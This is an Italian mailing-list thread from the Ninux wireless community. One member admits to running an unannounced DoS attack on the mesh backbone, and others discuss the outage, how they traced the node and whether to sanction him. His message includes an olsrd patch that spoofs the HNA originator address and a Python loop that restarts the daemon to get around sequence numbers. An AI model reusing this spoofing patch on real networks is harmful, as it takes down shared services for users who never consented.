[Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: "Malfunzionamento" a Gallia

Alessandro (aka ArkaNet) arkantiko a gmail.com
Dom 25 Maggio 2014 13:31:48 CEST


Perdona(te) il replay ma è doveroso...

1) che si approvi o meno, la farm è la meta che si prefiggerebbe chiunque
in un 'attacco' simile
2) i servizi sono come il miele per api ed orsi, ergo vedi 1)
3) avrei scelto anche io l'indirizzo di una macchina ancora non esistente
né sul mapserver né sul wiki

Detto ciò non avere fretta di sentirti tu il diretto interessato
dell'attacco, solo perché tu hosti la farm, è la rete che deve *imparare* a
difendersi e come vedi abbiamo imparato anche un'altra cosa, ovvero che se
un servizio è centralizzato è più semplice da identificare ed attaccare

Quindi, sì Buona Domenica ;)

*--
Arka*



Il giorno 25 maggio 2014 12:27, Andrea Pescetelli <
andrea.pescetelli a gmail.com> ha scritto:

> Non è sminuendo la cosa che si risolve il problema.
> Dove andare a colpire in un azione premeditata?
> I servizi di tutti perchè ZioProto se ne frega della chat dove gli altri
> fanno gsoc e scambiano opinioni.
> Dove? Nella Farm che lui stesso non approva e guarda caso dove ci sta
> anche casa mia dove forse per qualche motivo in un futuro avrebbe potuto
> girarci anche il blog che gyardacaso non approva.
> Quale subnet? La pubbica della farm e perchè non quella dove ci sta anche
> il mail server di Nino?
> Quale target? Una macchina guarda caso di casa al mare di Pierluigi che
> abbiamo sostituito giovedi' insieme ad altre 3 perchè seccate da un fulmine
> quindo oltre al culo per sistemare pura la presa per il culo a fare la
> caccia alle streghe di un danno provocato senza avviso.
>
> No grazie se devo bestemmiare allora bestemmio e questo non è relax ma
> danno provocato e torno a ripetere che un provvedimento simbolico va preso.
> Non mi curo che sia ZioProto o qualsiasi altro ma che sia di esempio.
>
> Se per voi questa è ninux allora non utilizzate i servizi che non
> approvate e fate un passo indietro.
>
>
>
>
> Il giorno 25 maggio 2014 12:16, Alessandro (aka ArkaNet) <
> arkantiko a gmail.com> ha scritto:
>
> Hola!
>>
>> Fish hai ragione dobbiamo fare qualcosa!!
>> Sicuramente ZioProTo ci sta facendo capire quanto sia semplice per un
>> macellaio utilizzare un coltello.
>> Cosa dovremmo aver acquisito alla luce di ciò?
>> Che se arrivasse un assassino e si impadronisse del coltello, farebbe una
>> strage!
>>
>> Ora, senza troppe metafore, ci siamo resi conto che se qualcuno ha voglia
>> (e capacità) può farci male.
>>  I provvedimenti dobbiamo prenderli per evitare minacce *esterne*, e che
>> sicuramente non avvisino prima di agire!
>> Dire che Saverio sia una minaccia sarebbe come entrare in chiesa e
>> bestemmiare, insomma ... non si fa ;)
>>
>> Se vogliamo una rete 'pronta' e con una certa resilienza, dobbiamo
>> costruircela. A volte non basta fare il link migliore per poter dire di
>> avere una struttura solida.
>> Abbiamo anche bisogno di un motore che spinga!
>>
>> E poi ricordiamoci che ninux fa rima con relax!
>>
>> Io direi "fortuna che era un'azione controllata!" (e fatta apposta per
>> essere controllabile)
>>
>> Bella && Buona Domenica @tutti
>>
>> *--
>> Arka*
>>
>>
>>
>> Il giorno 25 maggio 2014 09:37, Andrea Pescetelli <
>> andrea.pescetelli a gmail.com> ha scritto:
>>
>> Ciao
>>> Vorrei chiedere di prendere provvedimenti seri a seguito di questi
>>> eventi e comportamenti che da una settimana stanno invalidando sia il
>>> rispetto reciproco sia il buon finzionamento della rete stessa da parte di
>>> Saverio Proto.
>>> Il 25/mag/2014 09:07 "Alessandro Gnagni" <alessandro a gnagni.it> ha
>>> scritto:
>>>
>>>>  Non è qualche ora. Va avanti da giovedì mattina.
>>>> Ma almeno avvisare? Uno non può perdere tempo appresso a ste cose...
>>>> Jabber è stato ko da giovedì per sta cosa.
>>>> Il 25/mag/2014 01:03 "Saverio Proto" <zioproto a gmail.com> ha scritto:
>>>>
>>>>> Ciao,
>>>>>
>>>>> Metto in Cc: anche wireless a ml.ninux.org perché questa email contiene
>>>>> informazioni tecniche interessanti.
>>>>>
>>>>> bravi, avete risolto il problema in fretta :) Ho volutamente provato
>>>>> un attacco DoS sul backbone per capire che effetto poteva avere.
>>>>>
>>>>> ecco la patch di olsrd con cui generavo l'attacco DoS
>>>>>
>>>>> diff --git a/src/build_msg.c b/src/build_msg.c
>>>>> index 109f955..e252981 100644
>>>>> --- a/src/build_msg.c
>>>>> +++ b/src/build_msg.c
>>>>> @@ -1021,7 +1021,11 @@ serialize_hna4(struct interface *ifp)
>>>>>    m = (union olsr_message *)msg_buffer;
>>>>>
>>>>>    /* Fill header */
>>>>> -  m->v4.originator = olsr_cnf->main_addr.v4.s_addr;
>>>>> +  struct in_addr fakesource;
>>>>> +  fakesource.s_addr = 0;
>>>>> +  //inet_hton(2956867021,&fakesource);
>>>>> +  inet_aton("172.16.40.40",&fakesource);
>>>>> +  m->v4.originator = fakesource.s_addr;
>>>>>    m->v4.hopcnt = 0;
>>>>>    m->v4.ttl = MAX_TTL;
>>>>>    m->v4.olsr_msgtype = HNA_MESSAGE;
>>>>>
>>>>>
>>>>> una domanda,
>>>>>
>>>>> se avessi patchato anche:
>>>>>
>>>>> m->v4.hopcnt = XXX
>>>>>
>>>>> mettendo numeri casuali..
>>>>>
>>>>> sarebbe stato altrettanto facile capire chi è che iniettava questi
>>>>> messaggi ?
>>>>>
>>>>> mi sto divertendo parecchio con questi attacchi DoS, sono molto
>>>>> istruttivi. Per chi vuole giocare insieme a me a programmare in C
>>>>> possiamo approfondire il giovedi sera al Sans Papiers. (Il prossimo
>>>>> che vorrei provare è DrDoS su snmp).
>>>>>
>>>>> un problema di questo attacco sono cmq i sequence number. Per rendere
>>>>> l'attacco efficace ho dovuto far andare la mia instanza patchata di
>>>>> OLSR a singhiozzo:
>>>>>
>>>>> import os
>>>>> import time
>>>>>
>>>>> while True:
>>>>>         os.system("olsrd")
>>>>>         print "started\n"
>>>>>         time.sleep(120)
>>>>>         os.system("killall olsrd")
>>>>>         print "killed\n"
>>>>>         time.sleep(300)
>>>>>
>>>>> in quanto avevo bisogno che i miei sequence number dovevano sempre
>>>>> essere piu bassi di quelli del spoofato, altrimenti venivano scartati
>>>>> come out of sequence.
>>>>>
>>>>> vi va di scrivere insieme un articoletto per il blog ? Io scrivo la
>>>>> parte di come ti costruisce l'attacco e voi la parte di come avete
>>>>> fatto ad identificare il nodo spoofato ?
>>>>>
>>>>> ho staccatto il nodo attaccante, il gioco è finito :)
>>>>>
>>>>> ah... vi prego nessun malumore per qualche oretta di disservizi, this
>>>>> is Ninux. Si fanno queste cose perché ci si diverte insieme.
>>>>>
>>>>> ciao :)
>>>>>
>>>>> Saverio
>>>>>
>>>>> Il 24 maggio 2014 23:23, Andrea Pescetelli
>>>>> <andrea.pescetelli a gmail.com> ha scritto:
>>>>> > Saverio,
>>>>> > Abbiamo rilevato che dal nodo Gallia viene generato un messaggio
>>>>> olsr hna
>>>>> > con originator 172.16.40.40, validity time 570, hna 176.62.53.192/28
>>>>> > proveniente dal nodo in oggetto.
>>>>> >
>>>>> > Questo problema sta oscurando diversi servizi di ninux in farm
>>>>> appartenenti
>>>>> > a quella subnet.
>>>>> >
>>>>> > Abbiamo triangolato la posizione basandoci sugli hop count dei
>>>>> cammini
>>>>> > multipli.
>>>>> > puoi verificare?
>>>>> >
>>>>> > Grazie
>>>>> >
>>>>> > Fish, Hispanico, Halino
>>>>> > --
>>>>> > Andrea Pescetelli aka Fish
>>>>> > Skype: andrea5742
>>>>> > Ninux int: 5001/5002
>>>>> > Mobile: +39 3891156050
>>>>> >
>>>>> >
>>>>> >
>>>>> >
>>>>>
>>>>
>>>> _______________________________________________
>>>> Wireless mailing list
>>>> Wireless a ml.ninux.org
>>>> http://ml.ninux.org/mailman/listinfo/wireless
>>>>
>>>>
>>
>
>
> --
> Andrea Pescetelli aka Fish
> Skype: andrea5742
> Ninux int: 5001/5002
> Mobile: +39 3891156050
>
>
>
>
>
> _______________________________________________
> Wireless mailing list
> Wireless a ml.ninux.org
> http://ml.ninux.org/mailman/listinfo/wireless
>
>
-------------- parte successiva --------------
Un allegato HTML è stato rimosso...
URL: <http://ml.ninux.org/pipermail/wireless/attachments/20140525/1dc68b43/attachment-0001.html>


Maggiori informazioni sulla lista Wireless